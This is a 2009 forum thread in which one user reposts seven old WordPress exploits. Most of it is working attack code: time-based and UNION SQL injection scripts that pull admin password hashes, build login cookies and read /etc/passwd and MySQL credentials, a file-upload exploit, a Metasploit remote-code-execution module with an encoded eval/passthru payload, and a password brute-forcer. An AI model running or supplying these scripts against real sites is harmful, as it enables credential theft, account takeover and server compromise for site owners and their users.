WordPress
aka_kludge | Дата: Пятница, 05.06.2009, 12:04 | Сообщение # 1 |
| Wordpress 2.1.3 admin-ajax.php SQL Injection Blind Fishing Exploit error_reporting(E_ALL); $norm_delay = 0; /////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////// // WordPress 2.1.3 "admin-ajax.php" sql injection blind fishing exploit // written by Janek Vind "waraxe" // http://www.waraxe.us/ // 21. may 2007 /////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////// //===================================================================== $outfile = './warlog.txt';// Log file $url = 'http://localhost/wordpress.2.1.3/wp-admin/admin-ajax.php'; $testcnt = 300000;// Use bigger numbers, if server is slow, default is 300000 $id = 1;// ID of the target user, default value "1" is admin's ID $suffix = '';// Override value, if needed $prefix = 'wp_';// WordPress table prefix, default is "wp_" //====================================================================== echo "Target: $url\n"; echo "sql table prefix: $prefix\n"; if(empty($suffix)) { $suffix = md5(substr($url, 0, strlen($url) - 24)); } echo "cookie suffix: $suffix\n"; echo "testing probe delays \n"; $norm_delay = get_normdelay($testcnt); echo "normal delay: $norm_delay deciseconds\n"; $hash = get_hash(); add_line("Target: $url"); add_line("User ID: $id"); add_line("Hash: $hash"); echo "\nWork finished\n"; echo "Questions and feedback - http://www.waraxe.us/ \n"; die("See ya! 
\n"); /////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////// function get_hash() { $len = 32; $field = 'user_pass'; $out = ''; echo "finding hash now ...\n"; for($i = 1; $i < $len + 1; $i ++) { $ch = get_hashchar($field,$i); echo "got $field pos $i --> $ch\n"; $out .= "$ch"; echo "current value for $field: $out \n"; } echo "\nFinal result: $field=$out\n\n"; return $out; } /////////////////////////////////////////////////////////////////////// function get_hashchar($field,$pos) { global $prefix, $suffix, $id, $testcnt; $char = ''; $cnt = $testcnt * 4; $ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh'; $ipattern = " UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt,MD5(1337)),3)/*"; // First let's determine, if it's number or letter $inj = sprintf($ipattern, $prefix, $id, ">57"); $post = sprintf($ppattern, $suffix, $inj, $suffix); $letter = test_condition($post); if($letter) { $min = 97; $max = 102; echo "char to find is [a-f]\n"; } else { $min = 48; $max = 57; echo "char to find is [0-9]\n"; } $curr = 0; while(1) { $area = $max - $min; if($area < 2 ) { $inj = sprintf($ipattern, $prefix, $id, "=$max"); $post = sprintf($ppattern, $suffix, $inj, $suffix); $eq = test_condition($post); if($eq) { $char = chr($max); } else { $char = chr($min); } break; } $half = intval(floor($area / 2)); $curr = $min + $half; $inj = sprintf($ipattern, $prefix, $id, ">$curr"); $post = sprintf($ppattern, $suffix, $inj, $suffix); $bigger = test_condition($post); if($bigger) { $min = $curr; } else { $max = $curr; } echo "curr: $curr--$max--$min\n"; } return $char; } /////////////////////////////////////////////////////////////////////// function test_condition($p) { global $url, $norm_delay; $bret = false; $maxtry = 10; $try = 1; while(1) { $start = getmicrotime(); $buff = make_post($url, $p); $end = 
getmicrotime(); if($buff === '-1') { break; } else { echo "test_condition() - try $try - invalid return value ...\n"; $try ++; if($try > $maxtry) { die("too many tries - exiting ...\n"); } else { echo "trying again - try $try ...\n"; } } } $diff = $end - $start; $delay = intval($diff * 10); if($delay > ($norm_delay * 2)) { $bret = true; } return $bret; } /////////////////////////////////////////////////////////////////////// function get_normdelay($testcnt) { $fa = test_md5delay(1); echo "$fa\n"; $sa = test_md5delay($testcnt); echo "$sa\n"; $fb = test_md5delay(1); echo "$fb\n"; $sb = test_md5delay($testcnt); echo "$sb\n"; $fc = test_md5delay(1); echo "$fc\n"; $sc = test_md5delay($testcnt); echo "$sc\n"; $mean_nondelayed = intval(($fa + $fb + $fc) / 3); echo "mean nondelayed - $mean_nondelayed dsecs\n"; $mean_delayed = intval(($sa + $sb + $sc) / 3); echo "mean delayed - $mean_delayed dsecs\n"; return $mean_delayed; } /////////////////////////////////////////////////////////////////////// function test_md5delay($cnt) { global $url, $id, $prefix, $suffix; // delay in deciseconds $delay = -1; $ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh'; $ipattern = ' UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(LENGTH(user_pass)>31,BENCHMARK(%d,MD5(1337)),3)/*'; $inj = sprintf($ipattern, $prefix, $id, $cnt); $post = sprintf($ppattern, $suffix, $inj, $suffix); $start = getmicrotime(); $buff = make_post($url, $post); $end = getmicrotime(); if(intval($buff) !== -1) { die("test_md5delay($cnt) - invalid return value, exiting ..."); } $diff = $end - $start; $delay = intval($diff * 10); return $delay; } /////////////////////////////////////////////////////////////////////// function getmicrotime() { list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec); } /////////////////////////////////////////////////////////////////////// function make_post($url, $post_fields='', $cookie = '', $referer = '', 
$headers = FALSE) { $ch = curl_init(); $timeout = 120; curl_setopt ($ch, CURLOPT_URL, $url); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0); curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)'); if(!empty($cookie)) { curl_setopt ($ch, CURLOPT_COOKIE, $cookie); } if(!empty($referer)) { curl_setopt ($ch, CURLOPT_REFERER, $referer); } if($headers === TRUE) { curl_setopt ($ch, CURLOPT_HEADER, TRUE); } else { curl_setopt ($ch, CURLOPT_HEADER, FALSE); } $fc = curl_exec($ch); curl_close($ch); return $fc; } /////////////////////////////////////////////////////////////////////// function add_line($buf) { global $outfile; $buf .= "\n"; $fh = fopen($outfile, 'ab'); fwrite($fh, $buf); fclose($fh); } /////////////////////////////////////////////////////////////////////// ?>
aka_kludge | Дата: Пятница, 05.06.2009, 12:05 | Сообщение # 2 |
| WordPress 2.2 (wp-app.php) Arbitrary File Upload Exploit #! /usr/bin/env perl # Wordpress 2.2 and Wordpress MU <= 1.2.2 Arbitrary File Upload PoC # # Credits : Alexander Concha # Website : http://www.buayacorp.com/ # Advisory: http://www.buayacorp.com/files/wordpress/wordpress-advisory.html use Digest::MD5 qw(md5_hex); use LWP::UserAgent; my $ua = new LWP::UserAgent; my $blog = $ARGV[0]; my $user = $ARGV[1]; my $pass = $ARGV[2]; my $remote_file = $ARGV[3]; my $local_file = $ARGV[4]; my $post_id = $ARGV[5]; if (@ARGV < 4) { print "\nUsage:\n"; print " wp-file-upload.pl [local_file] [post_id]\n\n"; print " - full path to WordPress. http://victim.com/wordpress/ \n"; print " - valid username with any of these roles: author, editor, administrator\n"; print " - valid password for the user\n"; print " - full path to the remote file. /home/vulnerable.com/wordpress/wp-content/uploads/foo.php\n"; print " [local_file] - file to upload\n"; print " [post_id] - every time this script is executed creates a new post, specify a post_ID if you already run it\n\n"; exit(); } $ua->requests_redirectable([]); $blog =~ s/\/*$/\//; $url = 'wp-app.php'; if ( 200 != $ua->head($url . '?action=/service')->code ) { $url = 'app.php'; die "\nIt seems that this WP installation is not vulnerable: app.php and wp-app.php were not found.\n" unless 200 == $ua->head($url . '?action=/service')->code; } $auth_cookie = get_auth_cookie(); sub LWP::UserAgent::simple_request { my($self, $request, $arg, $size) = @_; $request->header('Cookie' => $auth_cookie); $request->content_type('image/gif') if $request->method eq "PUT"; $request->uri($blog . $request->uri); $self->_request_sanity_check($request); my $new_request = $self->prepare_request($request); $response = $self->send_request($new_request, $arg, $size); print $request->method . " " . $request->uri . " " . $response->code . 
"\n"; return $response; } sub get_contents { $file = shift; if ( -e $file ) { open FILE, $file or die("Invalid local file"); $file = join('', ); close FILE; } else { $file = < PHP } return $file; } sub get_auth_cookie { $response = $ua->head('wp-login.php?logout'); if ( $response->headers->header('Set-Cookie') =~ m/wordpress(user|pass)(.*?)=/ ) { return "wordpressuser$2=$user;wordpresspass$2=".md5_hex(md5_hex($pass)); } return ''; } if (0 == $post_id) { $response = $ua->get('wp-admin/post-new.php'); die ("\nInvalid credentials or blog url.\n\n" . $response->as_string) unless 200 == $response->code; if ( $response->content =~ m/name=._wpnonce. value=.([a-z\d]{10})./ ) { $response = $ua->post('wp-admin/post.php', [ '_wpnonce' => $1, 'action' => 'post', 'post_ID' => $post_id, 'post_type' => 'post', 'post_title' => 'foo', 'metakeyselect' => '#NONE#', 'metakeyinput' => '_wp_attached_file', 'metavalue' => $remote_file ], 'Cookie' => $auth_cookie); # Checks for post-new.php?posted=post_ID if ( $response->headers->header('Location') =~ m/posted=(\d+)/ ) { $post_id = $1; } } } die "\nCould not get a valid post_id value.\n" unless 0 != $post_id; $request = HTTP::Request->new(PUT => $url . '?action=/attachment/file/'.$post_id); $request->content(get_contents($local_file)); $response = $ua->request($request); if ( 200 == $response->code ) { print "\nIt seems that the file has been posted successfully... :P\n"; print "Use the following value to update the remote file: post_id '$post_id'\n"; } else { print "\nError: there is no attachment metadata for post_id=$post_id\n\n" . $response->as_string() . "\n"; }
aka_kludge | Дата: Пятница, 05.06.2009, 12:06 | Сообщение # 3 |
| Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit /* El error, bastante tonto por cierto, se encuentra en la función wp_suggestCategories, en el archivo xmlrpc.php: function wp_suggestCategories($args) { global $wpdb; $this->escape($args); $blog_id = (int) $args[0]; $username = $args[1]; $password = $args[2]; $category = $args[3]; $max_results = $args[4]; if(!$this->login_pass_ok($username, $password)) { return($this->error); } // Only set a limit if one was provided. $limit = ""; if(!empty($max_results)) { $limit = "LIMIT {$max_results}"; } $category_suggestions = $wpdb->get_results(" SELECT cat_ID category_id, cat_name category_name FROM {$wpdb->categories} WHERE cat_name LIKE '{$category}%' {$limit} "); return($category_suggestions); } Como se puede observar en la porción de código, no se hace una conversión a entero del valor de $max_results, por lo que es posible enviar valores del tipo 0 UNION ALL SELECT user_login, user_pass FROM wp_users. Para que un atacante logre su objetivo, es necesario que éste tenga una cuenta de usuario válida (una cuenta de tipo suscriber basta y sobra) en el sitio víctima. Preparé un pequeño exploit (Creditos: Alex) que devuelve la lista de usuarios con sus respectivas contraseñas en MD5, además también incluye las cookies de autenticación para cada usuario. 
Credits: Alex de la Concha code c sharp: */ using System; using System.Net; using System.Text; using System.Xml; using System.Text.RegularExpressions; using System.Security.Cryptography; class Program { static void Main(string[] args) { string targetUrl = "http://localhost/wp/"; string login = "alex"; string password = "1234"; string data = @" wp.suggestCategories 1 {0} {1} 1 0 UNION ALL SELECT user_login, user_pass FROM {2}users "; string cookieHash = GetCookieHash(targetUrl); using (WebClient request = new WebClient()) { /* Probar con el prefijo por omisión */ string response = request.UploadString(targetUrl + "xmlrpc.php", string.Format(data, login, password, "wp_svn_")); /* Se hace una nueva petición si la consulta anterior falla */ Match match = Regex.Match(response, @"FROM\s+(.*?)categories\s+"); if (match.Success) { response = request.UploadString(targetUrl + "xmlrpc.php ", string.Format(data, login, password, match.Groups[1].Value)); } try { XmlDocument doc = new XmlDocument(); doc.LoadXml(response); XmlNodeList nodes = doc.SelectNodes("//struct/member/value"); if (nodes != null && doc.SelectSingleNode("/methodResponse/fault") == null) { string user, pass; /* Mostrar lista de: * Usuario md5(contraseña) * Cookie de Autenticación * */ for (int i = 0; i < nodes.Count / 2 + 1; i += 2) { user = nodes.Item(i).InnerText; pass = nodes.Item(i + 1).InnerText; Console.WriteLine("Usuario: {0}\tMD5(Contraseña): {1}", user, pass); Console.WriteLine("Cookie: wordpressuser_{0}={1};wordpresspass_{0}={2}\n", cookieHash, user, MD5(pass)); } } else { Console.WriteLine("Error:\n{0}", response); } } catch (Exception ex) { Console.WriteLine("Error:\n" + ex.ToString()); } } } private static string GetCookieHash(string targetUrl) { WebRequest request = WebRequest.Create(targetUrl + "wp-login.php?action=logout"); request.Method = "HEAD"; (request as HttpWebRequest).AllowAutoRedirect = false; WebResponse response = request.GetResponse(); if (response != null) { Match match = 
Regex.Match(response.Headers["Set-Cookie"], @"wordpress[a-z]+_([a-z\d]{32})", RegexOptions.IgnoreCase); if (match.Success) return match.Groups[1].Value; } return string.Empty; } public static string MD5(string password) { MD5CryptoServiceProvider x = new MD5CryptoServiceProvider(); byte[] bs = Encoding.UTF8.GetBytes(password); bs = x.ComputeHash(bs); StringBuilder s = new StringBuilder(); foreach (byte b in bs) { s.Append(b.ToString("x2").ToLower()); } return s.ToString(); } } /* Para corregir este problema, mientras liberan actualizaciones para Wordpress 2.2, es editar el archivo xmlrpc.php y cambiar la línea $max_results = $args[4]; de la función wp_suggestCategories por $max_results = (int) $args[4]; o en su defecto bloquear el acceso a xmlrpc.php. o malo esque tienes que tener una cuenta aunque sea con los minimos permisos para obtener los demas nombres de users con sus respectivos MD5. static void Main(string[] args) { string targetUrl = "http://localhost/wp/"; string login = "alex"; string password = "1234"; hay seria la ruta donde esta colocado el wordpress 2.2, tu nombre de usuario y tu password. Ya se creo un zip con los archivos vulnerables ya reparados [ xmlrpc.php, wp-admin/post-new.php, wp-admin/page-new.php , wp-admin/users-edit.php. ] :: [Slappter] :: */
aka_kludge | Дата: Пятница, 05.06.2009, 12:07 | Сообщение # 4 |
| Wordpress 2.1.2 (xmlrpc) Remote SQL Injection Exploit #!/usr/bin/perl -w #Wordpress 2.1.2 SQL Injection POC #Credits: sid@notsosecure.com #Thanks to ferruh (ferruh@mavituna.com)for improving my exploitation skills #website:www.notsosecure.com #Wordpress version 2.1.2 is vulnerable to sql injection. This POC works when exploting with the credentials of a valid user. The user can belong to 'contributor' role or any higher role. Versions before 2.1.2 have not been tested but are most likely to be vulnerable as well. #Example:--------------------------------------------------------------------------------------- #C:\wp-xmlrpc-2-2-sql.pl" http://192.168.2.4/apache2-default/wordpress/ author author 5 # # The usage is correct # Trying Host http://192.168.2.4/apache2-default/wordpress/ ... #[+] The xmlrpc-2-2 server seems to be working #-------------------- #Username for id = 1 is:--> admin # #Md5 hash for user: admin # #is: 21232f297a57a5a743894a0e4a801fc3 # #-------------------- #Username for id = 2 is:--> contri # #Md5 hash for user: contri # #is: 95a178dde9d3fa2bde4971f10d3acc3e # #-------------------- #Username for id = 3 is:--> author # #Md5 hash for user: author # #is: 02bd92faa38aaa6cc0ea75e59937a1ef # #----------------------- #Total Number of Users found:-->3 #----------------------- #Mysql is running as: root@localhost # #Encrypted password for: root@localhost # is: root@localhost67457e226a1a15bd # #This deserves no mercy.... 
Lets get the /etc/passwd #.......imho...Here is the /etc/passwd file: #root:x:0:0:root:/root:/bin/bash #daemon:x:1:1:daemon:/usr/sbin:/bin/sh #bin:x:2:2:bin:/bin:/bin/sh #sys:x:3:3:sys:/dev:/bin/sh #sync:x:4:65534:sync:/bin:/bin/sync #games:x:5:60:games:/usr/games:/bin/sh #man:x:6:12:man:/var/cache/man:/bin/sh #lp:x:7:7:lp:/var/spool/lpd:/bin/sh #mail:x:8:8:mail:/var/mail:/bin/sh #news:x:9:9:news:/var/spool/news:/bin/sh #uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh #proxy:x:13:13:proxy:/bin:/bin/sh #www-data:x:33:33:www-data:/var/www:/bin/sh #backup:x:34:34:backup:/var/backups:/bin/sh #list:x:38:38:Mailing List Manager:/var/list:/bin/sh #gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh #messagebus:x:100:103::/var/run/dbus:/bin/false #postgres:x:101:105:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash #haldaemon:x:103:109:Hardware abstraction layer,,,:/home/haldaemon:/bin/false #gdm:x:104:112:Gnome Display Manager:/var/lib/gdm:/bin/false #mysql:x:105:113:MySQL Server,,,:/var/lib/mysql:/bin/false #sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin #snort:x:107:115:Snort IDS:/var/log/snort:/bin/false #postfix:x:108:116::/var/spool/postfix:/bin/false #stunnel4:x:109:118::/var/run/stunnel4:/bin/false #arpwatch:x:111:120:ARP Watcher,,,:/var/lib/arpwatch:/bin/sh #statd:x:112:65534::/var/lib/nfs:/bin/false #sfs:x:113:121::/var/lib/sfs:/bin/false #ftp:x:114:65534::/home/ftp:/bin/false #Debian-exim:x:115:122::/var/spool/exim4:/bin/false #telnetd:x:116:123::/nonexistent:/bin/false #------------------------------------------------------------------------------------------------------- #use warnings; use LWP::UserAgent; my $ua = new LWP::UserAgent; $ua->agent("Wordpress Hash Grabber v2.0" . $ua->agent); my $host = $ARGV[0]; # The path to xmlrpc.php my $username= $ARGV[1];#username my $password= $ARGV[2];#password my $postid= $ARGV[3];#post id which the user can edit my $pref = 'wp_'; # database prefix! 
my $hash_pass=""; #$root='root@localhost.com'; if (@ARGV < 4) { print " -----------------------------------------------------------------------\n"; print " wp-xmlrpc-sql.pl - Wordpress xmlrpc.php 'post_id' sql injection exploit\n Version 2.1.2"; print " by NotSoSecure // www.notsosecure.com \n"; print " coded by sid //sid\@notsosecure.com // 31.03.2007\n"; print " ------------------------------------------------------------------------\n"; print " Usage:\n"; print " wp-xmlrpc-sql.pl \n"; print "\n"; print " - host for attack\n full path eg. http://192.168.1.4/wordpress/ "; print " - valid username, can be in any of these role: contributor, author, editor \n"; print " - valid password for the user\n"; print " - valid post_id which the user can edit\n"; print " ------------------------------------------------------------------------\n"; exit(); } print "\n The usage is correct\n Trying Host $host ...\n"; my $res = $ua->get($host.'/xmlrpc.php'); if ( $res->content =~ /XML-RPC server accepts POST requests only/is ) { print "[+] The xmlrpc server seems to be working \n"; } else { print "--------------------\n"; print "[error]--> Something seems to be wrong with the xmlrpc.php \nCheck the full path to xmlrpc.php again\n "; # Sloppy way of debugging, remove if you want open(LOG, ">wp_out.html"); print LOG $res->content; exit; } for ($i=1; $i<=100 ;$i++) { #bug: if a user has been deleted the corresponding id will be missing. #change this to point to the known ids or the usernames, or just make it go for top 100 ids #obtaining usernames and userid my $sql = "mt.setPostCategories ".$postid." union all select user_login from wp_users where id=".$i." ".$username." ".$password." categoryId 1 categoryName Uncategorized isPrimary 0 "; my $req = new HTTP::Request POST => $host . 
"/xmlrpc.php"; $req->content($sql); $res = $ua->request($req); $out = $res->content; if($out=~ /Bad login\/pass combination/) { print "--------------------\n"; print "[error]-->Invalid username/password conbination\n"; exit; } if($out=~ /Sorry, you can not edit this post/) { print "--------------------\n"; print "[error]-->INVALID postid \n Supply a post id which can be edited by this user.\n"; exit; } if ($out =~ /DELETE FROM wp_post2cat/) { #print "found"; print "--------------------\n"; @result2=split(/category_id =/,$out); #to do: remove the assumption that username is less than 10 char $final=substr($result2[1],1,10); print "Username for id = ".$i." is:--> ".$final."\n"; no warnings; #obtaining md5 hash for the username my $sql2 = "mt.setPostCategories ".$postid." union all select user_pass from wp_users where id=".$i." ".$username." ".$password." categoryId 1 categoryName Uncategorized isPrimary 0 "; my $req2 = new HTTP::Request POST => $host . "/xmlrpc.php"; $req2->content($sql2); $res2 = $ua->request($req2); $out2 = $res2->content; @result3=split(/category_id =/,$out2); $hash=substr($result3[1],1,33); print "Md5 hash for user: ".$final." \nis: ".$hash."\n"; } else { print "-----------------------\n"; print "Total Number of Users found:-->".($i-1)."\n"; print "-----------------------\n"; #lets find wat the db is running as: my $sql2 = "mt.setPostCategories ".$postid." union all select user() ".$username." ".$password." categoryId 1 categoryName Uncategorized isPrimary 0 "; my $req2 = new HTTP::Request POST => $host . "/xmlrpc.php"; $req2->content($sql2); $res2 = $ua->request($req2); $out2 = $res2->content; @result3=split(/category_id =/,$out2); $hash_user=substr($result3[1],1,20); print "Mysql is running as: ".$hash_user."\n"; #lets get the password hash of the db_user for offline cracking #buggy code my $sql3 = "mt.setPostCategories ".$postid." union all select concat(user(),mysql.user.Password) from mysql.user where user=user() ".$username." ".$password." 
categoryId 1 categoryName Uncategorized isPrimary 0 "; my $req3 = new HTTP::Request POST => $host . "/xmlrpc.php"; $req3->content($sql3); $res3 = $ua->request($req3); $out3 = $res3->content; my $hash_pass=""; #print $out3; if ($out3=~m/SELECT command denied to user/) { print "Cant get the password for this user, \nPermission Denied, Thats better security!!"; exit;} else{ @result3=split(/category_id =/,$out3); $hash_pass=substr($result3[1],1,30); print $hash_pass; if ($hash_pass eq "") { print "No Password set"; } else{ print "Encrypted password for: ".$hash_user."\n is ".$hash_pass."\n"; } #IF database is running as root, lets rip it apart if ($hash_user =~m/root/) { print"\nThis deserves no mercy....\n Lets get the /etc/passwd\n.......imho...\n\n"; my $sql4 = "mt.setPostCategories ".$postid." union all select load_file(0x2f6574632f706173737764) ".$username." ".$password." categoryId 1 categoryName Uncategorized isPrimary 0 "; my $req2 = new HTTP::Request POST => $host . "/xmlrpc.php"; $req2->content($sql4); $res2 = $ua->request($req2); $out2 = $res2->content; @result3=split(/category_id =/,$out2); $hash=substr($result3[1],1,1600); print "Here is the /etc/passwd file:\n\n\n"; print $hash; } exit; } } }
aka_kludge | Дата: Пятница, 05.06.2009, 12:07 | Сообщение # 5 |
| Wordpress <= 1.5.1.3 Remote Code Execution eXploit (metasploit) ## # Title: Wordpress <= 1.5.1.3 Remote Code Execution eXploit (metasploit) # Name: php_wordpress.pm # License: Artistic/BSD/GPL # Info: I lub metasploit yummmm (str0ke ! milw0rm.com). # # Recoded Kartoffelguru's php code for metasploit. I love cookies. /str0ke # # # # - This is an exploit module for the Metasploit Framework, please see # http://metasploit.com/projects/Framework for more information. # ## package Msf::Exploit::php_wordpress; use base "Msf::Exploit"; use strict; use Pex::Text; use bytes; my $advanced = { }; my $info = { 'Name' => 'Wordpress <= 1.5.1.3 Remote Code Execution eXploit', 'Version' => '$Revision: 1.0 $', 'Authors' => [ 'str0ke' ], 'Arch' => [ ], 'OS' => [ ], 'Priv' => 0, 'UserOpts' => { 'RHOST' => [1, 'ADDR', 'The target address'], 'RPORT' => [1, 'PORT', 'The target port', 80], 'VHOST' => [0, 'DATA', 'The virtual host name of the server'], 'RPATH' => [1, 'DATA', 'Path WordPress root directory', '/'], 'SSL' => [0, 'BOOL', 'Use SSL'], }, 'Description' => Pex::Text::Freeform(qq{ This module exploits a code execution exploit in wordpress blog <= 1.5.1.3. 
}), 'Refs' => [ ['MIL', '1142'], ], 'Payload' => { 'Space' => 512, 'Keys' => ['cmd', 'cmd_bash'], }, 'Keys' => ['wordpress'], }; sub new { my $class = shift; my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); return($self); } sub Exploit { my $self = shift; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $vhost = $self->GetVar('VHOST') || $target_host; my $path = $self->GetVar('RPATH'); my $cmd = $self->GetVar('EncodedPayload')->RawPayload; my $encoded = Pex::Text::Base64Encode("passthru(\"$cmd\");"); $encoded =~ s/\n//gm; my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $encoded)); $byte.=".chr(32)"; my $str = Pex::Text::Base64Encode('args[0]=eval(base64_decode('.$byte.')).die()&args[1]=x'); $str =~ s/\n//gm; my $data = "wp_filter[query_vars][0][0][function]=get_lastpostdate;wp_filter[query_vars][0][0][accepted_args]=0;". "wp_filter[query_vars][0][1][function]=base64_decode;wp_filter[query_vars][0][1][accepted_args]=1;". "cache_lastpostmodified[server]=//e;cache_lastpostdate[server]=$str". ";wp_filter[query_vars][1][0][function]=parse_str;wp_filter[query_vars][1][0][accepted_args]=1;". "wp_filter[query_vars][2][0][function]=get_lastpostmodified;wp_filter[query_vars][2][0][accepted_args]=0;". "wp_filter[query_vars][3][0][function]=preg_replace;wp_filter[query_vars][3][0][accepted_args]=3;"; my $req = "GET $path HTTP/1.0\r\n". "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)\r\n". "Host: $vhost:$target_port\r\n". "Pragma: no-cache\r\n". "Accept: */*\r\n". "Cookie: $data\r\n". "\r\n"; my $s = Msf::Socket::Tcp->new( 'PeerAddr' => $target_host, 'PeerPort' => $target_port, 'LocalPort' => $self->GetVar('CPORT'), 'SSL' => $self->GetVar('SSL'), ); if ($s->IsError){ $self->PrintLine(' Error creating socket: ' . 
$s->GetError); return; } $self->PrintLine(" Sending the malicious WordPress Get request..."); $s->Send($req); my $results = $s->Recv(-1, 20); $s->Close(); $self->PrintLine($results); return; } 1;
aka_kludge | Дата: Пятница, 05.06.2009, 12:09 | Сообщение # 6 |
| WordPress <= 1.5.1.1 SQL Injection Exploit #!/usr/bin/perl -w # # SQL Injection Exploit for WordPress <= 1.5.1.1 # This exploit shows the username of the administrator of the blog and his # password crypted in MD5, you must only choose the correct version of the target # Related advisory: http://www.gentoo.org/security/en/glsa/glsa-200506-04.xml # Patch: download the last version at http://wordpress.org/download/ # Coded by Alberto Trivero use LWP::Simple; print "\n\t====================================\n"; print "\t= Exploit for WordPress <= 1.5.1.1 =\n"; print "\t= by Alberto Trivero =\n"; print "\t====================================\n\n"; if(!$ARGV[0] or !($ARGV[0]=~m/http/) or !($ARGV[1]==1 or $ARGV[1]==2)) { print "Usage:\nperl $0 [full_target_path] [target_version: 1 OR 2]\nVersion 1: WordPress <= 1.5\nVersion 2: WordPress 1.5.1 - 1.5.1.1\n\n"; print "Examples:\nperl $0 http://www.example.com/wordpress/ 2\n"; exit(0); } $page=get($ARGV[0]."index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/*") || die "[-] Unable to retrieve: $!" if($ARGV[1]==1); $page=get($ARGV[0]."index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/*") || die "[-] Unable to retrieve: $!" if($ARGV[1]==2); print "[+] Connected to: $ARGV[0]\n"; $page=~m/:([a-f0-9]{32}):(.*?):/; print "[+] Username of administrator is: $2\n" if($2); print "[+] MD5 hash of password is: $1\n" if($1); print "[-] Unable to retrieve username\n" if(!$2); print "[-] Unable to retrieve hash of password\n" if(!$1);
aka_kludge | Дата: Пятница, 05.06.2009, 12:12 | Сообщение # 7 |
| Wordpress <= 2.x dictionnary & Bruteforce attack ############## Source code ##################### #!usr/bin/python # Flaw found on Wordpress # that allow Dictionnary & Bruteforce attack # Greetz goes to : NeoMorphS, Tiky # Vendor : http://wordpress.org/ # Found by : Kad (kadfrox (at) gmail (dot) com [email concealed] / #kadaj-diabolik (at) hotmail (dot) fr [email concealed]) import urllib , urllib2, sys, string tab = "%s%s%s"%( string.ascii_letters, string.punctuation, string.digits ) tab = [ i for i in tab ] def node( table, parent, size ): if size == 0: pass else: for c in table: string = "%s%s"%( parent, c ) data = {'log': sys.argv[2], 'pwd': string} print "[+] Testing : "+string request = urllib2.Request(server, urllib.urlencode(data)) f = urllib2.urlopen(request).read() if not "Incorrect password." in f: print "[!] Password is : "+mot ; break node( table, string, size-1 ) def bruteforce( table, size ): for c in table: node( table, c, size-1 ) if (len(sys.argv) < 3): print "Usage : float.py " print "\nDefault: User is 'admin'" print "Choice : 1} Dictionnary Attack, use dictionnary file" print " 2} Bruteforce Attack, use number of character for password" else: server = sys.argv[1] if sys.argv[3] == "1": a , b = open(sys.argv[4],'r') , 0 for lines in a: b = b + 1 a.seek(0) c = 0 while (c < b): mot = a.readline().rstrip() data = {'log': sys.argv[2], 'pwd': mot} print "[+] Testing : "+mot request = urllib2.Request(server, urllib.urlencode(data)) f = urllib2.urlopen(request).read() if not "Incorrect password." in f: print "[!] 
Password is : "+mot ; break else: c = c + 1 ; pass if sys.argv[3] == "2": print "[-] Server is : "+server print "[-] User is : "+sys.argv[2] print "[-] Number of characters are : "+sys.argv[4] number = int(sys.argv[4]) bruteforce( tab, number ) ############## Source code ##################### The problem is : many time, the default user who is created is : admin, then you can try to crack the password, to stop that, you can use image confirmation or a limit for the connection (for example, only 5 tests). To know if "admin" is the default user, you can try to go to the login page : http://site.com/wp-login.php and you try ; login : admin, pass : test (or anything else). if "Wrong password" is printed on the page, the default user is admin, but if there is : "Wrong Username" then it's not the default password Kad'